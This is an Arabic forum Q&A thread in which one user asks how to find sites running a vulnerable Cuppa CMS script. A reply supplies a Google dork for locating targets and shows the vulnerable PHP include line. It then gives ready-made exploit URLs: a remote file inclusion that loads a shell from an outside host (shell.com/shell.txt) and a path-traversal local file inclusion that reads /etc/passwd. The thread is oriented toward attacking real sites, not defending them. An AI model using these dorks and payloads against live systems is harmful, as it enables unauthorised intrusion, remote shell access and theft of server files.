قبل إضافة استفسارك ولكي لا يتعرض للحذف، أو ان تتعرض أنت للحظر، اقرأ قوانين قسم الإستفسارات
السلام عليكم هذه الثغرة ليس لها دورك ومش عارف اجيب الدورك http://www.exploit-db.com/exploits/25971/ ممكن حد يجيبلي الدورك بس اهم حاجة يكتب ازاي
نعم هذا الدورك intext:alerts/alertConfigField.php= وبعدها تقوم بحقن الملف المصاب بكود php لزرع ثغرة RFI و LFI هذا الكود <?php include($_REQUEST["urlConfig"]); ?> وبعدها مسار التنفيذ مثل هذه الروابط لثغرتين cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
لو ما طلعشي اي نتيجة بحث يبقي الثغرة خلاص مدتها انتهت او الشركة صاحبة السكربت رقعت الثغرة يعني مثلا
قوانين المنتدى